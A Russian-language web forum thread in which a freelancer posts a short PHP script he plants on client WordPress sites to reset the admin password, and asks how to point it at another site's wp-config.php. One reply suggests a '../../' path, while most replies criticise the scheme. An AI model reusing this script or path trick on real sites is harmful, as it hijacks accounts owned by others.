Функция require_once

Wordpreser
На сайте с 01.08.2013
Offline
47
1188

Доброй ночи.

Есть скрипт который ставлю в корень сайта на WP и после его запуска то пароль админки сбрасывается. Это моя защита от недобросовестных заказчиков.

Вот сам скрипт.

<?php
require_once('wp-config.php');
$new_password = md5('password');
$username = 'admin';
$wpdb->query("UPDATE `{$wpdb->prefix}users` SET `user_pass` = '{$new_password}' WHERE `user_login` = '{$username}'");
?>

Вопрос, он стоит на сайта мойсайт1.ру, а на другом сайте этого же хостера его нет. Вопрос, как изменить функцию require_once чтобы получить файл wp-config.php c другого сайта если адрес второго сайта известен и пути у хостера такие /www/МойДомен1/wp-config.php

LEOnidUKG
На сайте с 25.11.2006
Offline
1591
#1

А вы с этого форума не хотите получить файл config.php ну или с другого любого блога? Подумайте. Тщательно подумайте.

✅ Трастовых площадок под размещение статей и ссылок. Опыт 12 лет! ( https://searchengines.guru/ru/forum/675690 ) ⭐ Купить вечные трастовые ссылки для сайта ( https://getmanylinks.ru/?srh ) ⭐ Ускорение ваших сайтов (WP, Opencart и др.) + Настройка сервера ( https://searchengines.guru/ru/forum/997205 )
Александр Смирнов
На сайте с 30.08.2007
Offline
102
#2
Wordpreser:
Доброй ночи.
Есть скрипт который ставлю в корень сайта на WP и после его запуска то пароль админки сбрасывается. Это моя защита от недобросовестных заказчиков.
Вот сам скрипт.
<?php
require_once('wp-config.php');
$new_password = md5('password');
$username = 'admin';
$wpdb->query("UPDATE `{$wpdb->prefix}users` SET `user_pass` = '{$new_password}' WHERE `user_login` = '{$username}'");
?>

Вопрос, он стоит на сайта мойсайт1.ру, а на другом сайте этого же хостера его нет. Вопрос, как изменить функцию require_once чтобы получить файл wp-config.php c другого сайта если адрес второго сайта известен и пути у хостера такие /www/МойДомен1/wp-config.php

Как правило, хостеры заботятся о том, чтобы как раз другие пользователи не получили доступ к чужим файлам. Поэтому, никак. А если такое получается, то это причина искать нового хостера.

Разработаю веб-сервисы на Yii2 фреймворке от 150 тыс. руб. в мес. Обучу программированию на Yii2
K5
На сайте с 21.07.2010
Offline
209
#3

может уж сразу "ключи от квартиры где деньги лежат" (с) ??????

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
Wordpreser
На сайте с 01.08.2013
Offline
47
#4
А вы с этого форума не хотите получить файл config.php ну или с другого любого блога? Подумайте. Тщательно подумайте.

Вы меня явно не поняли. Причем тут форум? :-\

Я фрилансер, работал с человеком довольно долго, сделал ему порядка 6 сайтов. Последнюю часть оплаты не сделал и смылся. Скрипт стоит на одном из его сайтов, но мне нужно чтобы он брал конфиги с того сайта за который он не оплатил, вот поэтому и спрашиваю как просто подняться на 2 каталога вверх а потом на 2 вперед :) Надеюсь поймете.

dayw
На сайте с 25.01.2006
Offline
138
#5

require_once('../../wp-config.php');

Если аккаунт позволяет иметь доступ к другим сайтам, то можно в эту сторону копать

../../
Интернет-магазин игровых приставок в Москве (https://savelagame.ru)
Wordpreser
На сайте с 01.08.2013
Offline
47
#6

Вы меня не поняли, у меня был доступ к его хостингу, и мой скрипт есть на одном из его сайтов. И ничего лишнего я не собираюсь делать. Может добьюсь оплаты :)

sergv
На сайте с 13.04.2006
Offline
310
#7
dayw:
Если аккаунт позволяет иметь доступ к другим сайтам

Тогда уже можно и полный путь писать /www/ЧужойДомен1/wp-config.php

Но это дырка, а не хостинг получается... Даже не знаю каким криворуким надо быть, чтобы так настроить сервер.

---------- Добавлено 04.04.2014 в 10:50 ----------

Wordpreser, если доступ есть - зайди и запусти. Если доступа нет - ничего ты не сделаешь. Файлы лежат в чужом аккаунте, под чужим именем с чужой группой. Взять и заюзать их нельзя.

Попробуй работать по схеме - выкладывать работы на своих площадках, демонстрируй, принимай оплату и тогда переноси на хост к клиенту.

Просто "подкладывать" левые скрипты к клиентским проектам не очень красивое и правильное занятие. Порядочный клиент пароли сменил, работу оплатил, а скрипты остались.

Продвигай свои сайты на MainLink (http://mailink.ru) Регистрация и продление доменов в российских и международных зонах по честным ценам без звездочек. (https://RegHome.ru) (R01, WebNames, UK2). Принимаем WMR, WMP, ЯД, Visa, MasterCard, Мир
Wordpreser
На сайте с 01.08.2013
Offline
47
#8

Скрипт после оплаты удаляю.

Файлы лежат в чужом аккаунте, под чужим именем с чужой группой. Взять и заюзать их нельзя.

Я имел в виду переход по его аккаунту, на одном то сайте есть скрипт и через админку я могу его заменить чтобы он брал с другого сайта этого же пользователя.

LEOnidUKG
На сайте с 25.11.2006
Offline
1591
#9

Да заливайте сразу шел и всё. Ч0 уж париться то.

Joker-jar
На сайте с 26.08.2010
Offline
123
#10

> Я фрилансер

> сделал ему порядка 6 сайтов

@

> Вопрос, как изменить функцию require_once чтобы бла-бла

Оказываю услуги веб-программиста и администратора Linux. ICQ: 751355 | Jabber: jokerjar@jabber.ru | Skype: joker-jar

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий